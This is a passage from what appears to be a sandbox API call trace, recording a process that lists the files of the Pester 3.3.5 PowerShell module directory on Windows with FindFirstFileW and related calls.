Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0168.996] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0168.996] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.997] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0168.997] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.997] FindClose (in: hFindFile=0x1e35146b240 | out: hFindFile=0x1e35146b240) returned 1 [0168.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0168.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0168.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0168.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0168.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a820 [0168.998] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.998] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0168.998] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0168.998] FindClose (in: hFindFile=0x1e35146a820 | out: hFindFile=0x1e35146a820) returned 1 [0168.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0168.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0168.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0168.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0168.999] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b3c0 [0168.999] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0169.003] FindNextFileW (in: hFindFile=0x1e35146b3c0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.003] FindClose (in: hFindFile=0x1e35146b3c0 | out: hFindFile=0x1e35146b3c0) returned 1 [0169.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0169.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0169.003] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146bea0 [0169.004] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.005] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0169.005] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0169.005] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0169.005] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0169.005] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0169.007] FindNextFileW (in: hFindFile=0x1e35146bea0, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0169.007] FindClose (in: hFindFile=0x1e35146bea0 | out: hFindFile=0x1e35146bea0) returned 1 [0169.007] SetThreadErrorMode 